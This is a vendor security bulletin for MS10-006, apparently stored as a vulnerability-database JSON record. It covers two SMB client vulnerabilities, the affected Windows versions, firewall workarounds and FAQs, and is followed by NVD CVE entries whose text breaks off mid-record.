{"id": "SECURITYVULNS:DOC:23202", "bulletinFamily": "software", "title": "Microsoft Security Bulletin MS10-006 - Critical Vulnerabilities in SMB Client Could Allow Remote Code Execution (978251)", "description": "Microsoft Security Bulletin MS10-006 - Critical\r\nVulnerabilities in SMB Client Could Allow Remote Code Execution (978251)\r\nPublished: February 09, 2010\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves two privately reported vulnerabilities in Microsoft Windows. The vulnerabilities could allow remote code execution if an attacker sent a specially crafted SMB response to a client-initiated SMB request. To exploit these vulnerabilities, an attacker must convince the user to initiate an SMB connection to a malicious SMB server.\r\n\r\nThis security update is rated Critical for Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows 7, and Windows Server 2008 R2, and is rated Important for Windows Vista and Windows Server 2008. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses the vulnerabilities by correcting the manner in which the SMB client validates responses. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nRecommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.\r\n\r\nFor administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service.\r\n\r\nSee also the section, Detection and Deployment Tools and Guidance, later in this bulletin.\r\n\r\nKnown Issues. None\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software \r\nOperating System\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS06-030\r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS08-068\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS08-068\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS08-068\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS08-068\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS08-068\r\n\r\nWindows Vista and Windows Vista Service Pack 1\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-068\r\n\r\nWindows Vista Service Pack 2\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-068\r\n\r\nWindows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for 32-bit Systems*\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-068\r\n\r\nWindows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for x64-based Systems*\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-068\r\n\r\nWindows Server 2008 for x64-based Systems Service Pack 2*\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 for Itanium-based Systems\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS08-068\r\n\r\nWindows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows 7 for x64-based Systems\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 R2 for x64-based Systems*\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 or Windows Server 2008 R2 as indicated, whether or not installed using the Server Core installation option. For more information on this installation option, see the MSDN articles, Server Core and Server Core for Windows Server 2008 R2. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nIs this security update related to MS10-012, released on February 9, 2010? \r\nNo. Microsoft Security Bulletin MS10-012, "Vulnerabilities in SMB Server Could Allow Remote Code Execution," addresses different SMB components. This security update may be applied independently of any other update.\r\n\r\nIf I have installed the MS10-012 update, do I still need to install this update? \r\nYes. This security bulletin update addresses vulnerabilities in Windows SMB Client components, while MS10-012 addresses vulnerabilities in Windows SMB Server components.\r\n\r\nI am using an older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\n\r\nThe following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the February bulletin summary. For more information, see Microsoft Exploitability Index.\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tSMB Client Pool Corruption Vulnerability - CVE-2010-0016\tSMB Client Race Condition Vulnerability - CVE-2010-0017\tAggregate Severity Rating\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 3\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical\r\n\r\nWindows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nImportant \r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows 7 for 32-bit Systems\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows 7 for x64-based Systems\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 R2 for x64-based Systems*\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\nWindows Server 2008 R2 for Itanium-based Systems\r\n\t\r\n\r\nNot applicable\r\n\t\r\n\r\nCritical \r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\r\n*Server Core installation affected. This update applies, with the same severity rating, to supported editions of Windows Server 2008 and Windows Server 2008 R2, whether or not installed using the Server Core installation option. For more information on this installation option, see the MSDN articles, Server Core and Server Core for Windows Server 2008 R2. Note that the Server Core installation option does not apply to certain editions of Windows Server 2008 and Windows Server 2008 R2; see Compare Server Core Installation Options.\r\nTop of sectionTop of section\r\n\t\r\nSMB Client Pool Corruption Vulnerability - CVE-2010-0016\r\n\r\nAn unauthenticated remote code execution vulnerability exists in the way that Microsoft Server Message Block (SMB) Protocol software handles specially crafted SMB responses. An attempt to exploit the vulnerability would not require authentication, allowing an attacker to exploit the vulnerability by sending a specially crafted SMB response to a client-initiated SMB request. An attacker who successfully exploited this vulnerability could take complete control of the system.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0016.\r\n\t\r\nMitigating Factors for SMB Client Pool Corruption Vulnerability - CVE-2010-0016\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nThis is an SMB client vulnerability. In order to exploit this vulnerability, an attacker must convince a user to initiate an SMB connection with a malicious SMB server. Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. In this case, the SMB ports should be blocked from the Internet.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for SMB Client Pool Corruption Vulnerability - CVE-2010-0016\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nBlock TCP ports 139 and 445 at the firewall\r\n\r\nThese ports are used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft recommends that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, see the TechNet article, TCP and UDP Port Assignments.\r\n\r\nImpact of workaround. Several Windows services use the affected ports. Blocking connectivity to the ports may cause various applications or services to not function. Some of the applications or services that could be impacted are listed below:\r\n\u2022\t\r\n\r\nApplications that use SMB (CIFS)\r\n\u2022\t\r\n\r\nApplications that use mailslots or named pipes (RPC over SMB)\r\n\u2022\t\r\n\r\nServer (File and Print Sharing)\r\n\u2022\t\r\n\r\nGroup Policy\r\n\u2022\t\r\n\r\nNet Logon\r\n\u2022\t\r\n\r\nDistributed File System (DFS)\r\n\u2022\t\r\n\r\nTerminal Server Licensing\r\n\u2022\t\r\n\r\nPrint Spooler\r\n\u2022\t\r\n\r\nComputer Browser\r\n\u2022\t\r\n\r\nRemote Procedure Call Locator\r\n\u2022\t\r\n\r\nFax Service\r\n\u2022\t\r\n\r\nIndexing Service\r\n\u2022\t\r\n\r\nPerformance Logs and Alerts\r\n\u2022\t\r\n\r\nSystems Management Server\r\n\u2022\t\r\n\r\nLicense Logging Service\r\n\r\nHow to undo the workaround. Unblock TCP ports 139 and 445 at the firewall. For more information about ports, see TCP and UDP Port Assignments.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for SMB Client Pool Corruption Vulnerability - CVE-2010-0016\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the Microsoft Server Message Block (SMB) client implementation improperly validating fields in the SMB response. This could lead to a pool corruption issue resulting in code execution with system level privileges.\r\n\r\nWhat is Microsoft Server Message Block (SMB) protocol? \r\nMicrosoft Server Message Block (SMB) protocol is a Microsoft network file sharing protocol used in Microsoft Windows. For more information on SMB, see Microsoft SMB Protocol and CIFS Protocol Overview.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could take complete control of an affected system. Most attempts to exploit this vulnerability will cause an affected system to stop responding and restart.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could host a malicious SMB server that is designed to exploit this vulnerability and then convince a user to initiate an SMB connection with it. Additionally, an attacker on the local network could perform a man-in-the-middle attack to respond to a legitimate SMB request with a malformed SMB response.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAll affected operating systems are at risk.\r\n\r\nCan this vulnerability be exploited using Internet Explorer? \r\nNo. However, this issue may be exploited through Web transactions, regardless of browser type. In a Web-based attack scenario, an attacker would have to host a Web page that contains a specially crafted URI. A user who browsed that Web site will force an SMB connection to an SMB server controlled by the attacker, which would then send a malformed response back to the user. This response would result in code execution on the user's system. In addition, compromised Web sites and Web sites that accept or host user-provided content could contain specially crafted content that could exploit this vulnerability. An attacker would have no way to force users to visit a specially crafted Web site. Instead, an attacker would have to convince them to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes them to the attacker's site.\r\n\r\nWhat is a URI? \r\nA Uniform Resource Identifier (URI) is a string of characters used to act on or identify resources from the Internet or over a network. A URL is a typical example of a URI that references a resource such as a Web site. For more information about URIs, see RFC-2396.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by correcting the way fields in the SMB response are validated.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nSMB Client Race Condition Vulnerability - CVE-2010-0017\r\n\r\nAn unauthenticated remote code execution vulnerability exists in the way that Microsoft Server Message Block (SMB) Protocol software handles specially crafted SMB packets. An attempt to exploit the vulnerability would not require authentication, allowing an attacker to exploit the vulnerability by sending a specially crafted SMB response to client-initiated SMB request. An attacker who successfully exploited this vulnerability could take complete control of the system.\r\n\r\nOn Windows Vista and Windows Server 2008, this vulnerability could result in an elevation of privilege vulnerability due to the way that Microsoft Server Message Block (SMB) Protocol software handles specially crafted SMB negotiate responses. An attacker who successfully exploited this vulnerability could run arbitrary code with system-level privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. An attacker must have valid logon credentials and be able to log on locally to elevate privileges in this manner.\r\n\r\nThis vulnerability could also result in a denial of service. An attempt to exploit the vulnerability in this manner would not require authentication, allowing an attacker to exploit the vulnerability by sending a specially crafted SMB response to a client-initiated SMB request. An attacker who successfully exploited this vulnerability could cause the computer to stop responding until restarted.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-0017.\r\n\t\r\nMitigating Factors for SMB Client Race Condition Vulnerability - CVE-2010-0017\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nIn order to elevate privileges on Windows Vista and Windows Server 2008, an attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The privilege elevation vulnerability could not be exploited remotely or by anonymous users on these platforms. Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for SMB Client Race Condition Vulnerability - CVE-2010-0017\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nBlock TCP ports 139 and 445 at the firewall\r\n\r\nThese ports are used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft recommends that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, see the TechNet article, TCP and UDP Port Assignments.\r\n\r\nImpact of workaround. Several Windows services use the affected ports. Blocking connectivity to the ports may cause various applications or services to not function. Some of the applications or services that could be impacted are listed below:\r\n\u2022\t\r\n\r\nApplications that use SMB (CIFS)\r\n\u2022\t\r\n\r\nApplications that use mailslots or named pipes (RPC over SMB)\r\n\u2022\t\r\n\r\nServer (File and Print Sharing)\r\n\u2022\t\r\n\r\nGroup Policy\r\n\u2022\t\r\n\r\nNet Logon\r\n\u2022\t\r\n\r\nDistributed File System (DFS)\r\n\u2022\t\r\n\r\nTerminal Server Licensing\r\n\u2022\t\r\n\r\nPrint Spooler\r\n\u2022\t\r\n\r\nComputer Browser\r\n\u2022\t\r\n\r\nRemote Procedure Call Locator\r\n\u2022\t\r\n\r\nFax Service\r\n\u2022\t\r\n\r\nIndexing Service\r\n\u2022\t\r\n\r\nPerformance Logs and Alerts\r\n\u2022\t\r\n\r\nSystems Management Server\r\n\u2022\t\r\n\r\nLicense Logging Service\r\n\r\nHow to undo the workaround. Unblock TCP ports 139 and 445 at the firewall. For more information about ports, see TCP and UDP Port Assignments.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for SMB Client Race Condition Vulnerability - CVE-2010-0017\r\n\r\nWhat is the scope of the vulnerability? \r\nOn Windows 7 and Windows Server 2008 R2, this is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nOn Windows Vista and Windows Server 2008, this is an elevation of privilege vulnerability. An attacker who successfully exploited this vulnerability could execute arbitrary code and take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nFor all affected platforms, this vulnerability could also result in a denial of service. In this case, an attacker who exploited this vulnerability could cause the affected system to stop responding until it is manually restarted. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability is caused by the Microsoft Server Message Block (SMB) client implementation improperly handling a race condition that can occur when handling Negotiate responses.\r\n\r\nWhat is Microsoft Server Message Block (SMB) protocol? \r\nMicrosoft Server Message Block (SMB) protocol is a Microsoft network file sharing protocol used in Microsoft Windows. For more information on SMB, see Microsoft SMB Protocol and CIFS Protocol Overview.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could take complete control of an affected system. On Windows Vista and Windows Server 2008, an attacker who successfully exploited this vulnerability could run arbitrary code with system-level privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nAn attacker who successfully exploited this vulnerability leading to a denial of service could cause a user's system to stop responding until manually restarted.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nTo exploit this vulnerability to cause remote code execution or a denial of service, an attacker could host a malicious SMB server that is designed to exploit this vulnerability and then convince a user to initiate an SMB connection with it. Additionally, an attacker on the local network could perform a man-in-the-middle attack to respond to a legitimate SMB request with a malformed SMB response.\r\n\r\nTo exploit this vulnerability to elevate privileges, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take complete control over the affected system.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAll affected operating systems are at risk.\r\n\r\nCan this vulnerability be exploited using Internet Explorer? \r\nNo. However, this issue may be exploited through Web transactions, regardless of browser type. In a Web-based attack scenario, an attacker would have to host a Web page that contains a specially crafted URI. A user who browsed that Web site will force an SMB connection to an SMB server controlled by the attacker, which would then send a malformed response back to the user. This response would result in code execution on the user's system. In addition, compromised Web sites and Web sites that accept or host user-provided content could contain specially crafted content that could exploit this vulnerability. An attacker would have no way to force users to visit a specially crafted Web site. Instead, an attacker would have to convince them to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes them to the attacker's site.\r\n\r\nWhat is a URI? \r\nA Uniform Resource Identifier (URI) is a string of characters used to act on or identify resources from the Internet or over a network. A URL is a typical example of a URI that references a resource such as a Web site. For more information about URIs, see RFC-2396.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by correcting the manner in which the SMB client handles the race condition that can occur when handling SMB Negotiate responses.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nLaurent Gaffié of stratsec for reporting the SMB Client Pool Corruption Vulnerability (CVE-2010-0016) and the SMB Client Race Condition Vulnerability (CVE-2010-0017)\r\nTop of sectionTop of section\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (February 9, 2010): Bulletin published.", "published": "2010-02-10T00:00:00", "modified": "2010-02-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23202", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2010-0017", "CVE-2010-0016"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:33", "edition": 1, "viewCount": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-08-31T11:10:33", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-0016", "CVE-2010-0017"]}, {"type": "openvas", "idList": ["OPENVAS:902112", "OPENVAS:1361412562310902112"]}, {"type": "nessus", "idList": ["SMB_NT_MS10-006.NASL"]}, {"type": "seebug", "idList": ["SSV:19148", "SSV:19147"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/WINDOWS/SMB/MS10_006_NEGOTIATE_RESPONSE_LOOP"]}, {"type": "exploitdb", "idList": ["EDB-ID:12258"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10604"]}], "modified": "2018-08-31T11:10:33", "rev": 2}, "vulnersScore": 7.5}, "affectedSoftware": []}

{"cve": [{"lastseen": "2020-10-03T11:57:21", "description": "The SMB client implementation in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate response fields, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted response, aka \"SMB Client Pool Corruption Vulnerability.\"", "edition": 3, "cvss3": {}, "published": "2010-02-10T18:30:00", "title": "CVE-2010-0016", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0016"], "modified": "2019-02-26T14:04:00", "cpe": ["cpe:/o:microsoft:windows_server_2003:*", "cpe:/o:microsoft:windows_xp:-", "cpe:/o:microsoft:windows_2000:-", "cpe:/o:microsoft:windows_xp:*"], "id": "CVE-2010-0016", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0016", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_xp:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:-:sp3:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:-:sp2:home:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:-:sp4:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp2:professional_x64:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:57:21", "description": "Race condition in the SMB client implementation in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code, and in the SMB client implementation in Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges, via a crafted SMB Negotiate response, aka \"SMB Client Race Condition Vulnerability.\"", "edition": 3, "cvss3": {}, "published": "2010-02-10T18:30:00", "title": "CVE-2010-0017", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0017"], "modified": "2018-10-30T16:28:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2010-0017", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0017", 